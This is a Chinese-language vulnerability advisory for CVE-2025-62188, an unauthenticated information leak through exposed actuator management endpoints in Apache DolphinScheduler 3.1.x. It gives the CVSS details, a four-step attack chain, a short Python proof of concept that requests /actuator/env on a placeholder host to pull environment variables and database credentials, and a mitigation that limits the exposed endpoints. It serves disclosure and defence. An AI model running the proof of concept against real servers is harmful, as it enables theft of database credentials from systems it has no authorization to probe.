CVE-2025-62188 CVSS 7.5 高危

CVE-2025-62188 Apache DolphinScheduler信息泄露漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-62188

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache DolphinScheduler

漏洞概述

Apache DolphinScheduler存在敏感信息泄露漏洞。该漏洞允许未经授权的攻击者访问敏感信息，特别包括数据库凭证。此问题主要影响Apache DolphinScheduler 3.1.*系列版本。由于管理端点配置不当，攻击者无需任何身份验证和用户交互，即可通过网络访问特定的管理接口。成功利用此漏洞可导致系统机密性受到严重破坏，攻击者可借此获取关键的配置数据并进一步威胁后端数据库安全。

技术细节

该漏洞的核心在于Apache DolphinScheduler的管理端点配置存在缺陷。在受影响的3.1.*版本中，默认或特定配置下暴露了过多的Web管理端点，且未对访问权限进行严格校验。根据CVSS向量（AV:N/AC:L/PR:N/UI:N），攻击者可以在无需认证的情况下，通过网络路径发起低复杂度的攻击。攻击者只需向暴露的管理端点（如环境变量查询接口）发送HTTP请求，即可获得服务器端的敏感配置信息。这些信息往往包含数据库连接字符串、用户名及密码等关键凭证。一旦凭证泄露，攻击者可以直接连接数据库，造成数据泄露或被破坏，且不影响系统的完整性和可用性（I:N/A:N），主要危害集中在机密性（C:H）层面。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描目标网络，识别Apache DolphinScheduler服务及其开放的端口。

STEP 2

2. 端点探测

攻击者尝试访问默认的管理端点路径（如/actuator等），检查是否未授权访问。

STEP 3

3. 漏洞利用

无需认证，攻击者直接访问敏感信息泄露端点，获取环境变量或配置详情。

STEP 4

4. 数据窃取

解析返回的响应数据，提取数据库凭证等敏感信息，用于后续攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example: /actuator/env is commonly used for leaking env vars)
target_url = "http://vulnerable-host:12345/actuator/env"

try:
    # Send a GET request to the exposed management endpoint
    response = requests.get(target_url, timeout=5)

    if response.status_code == 200:
        print("[+] Potential sensitive information found:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

Apache DolphinScheduler 3.1.x

防御指南

临时缓解措施

对于无法立即升级的用户，建议通过设置环境变量 MANAGEMENT_ENDPOINTS_WEB_EXPOSURE_INCLUDE=health,metrics,prometheus 来限制暴露的管理端点，或者在 application.yaml 文件中添加相应配置，仅包含健康检查、指标和Prometheus端点，从而避免敏感信息泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表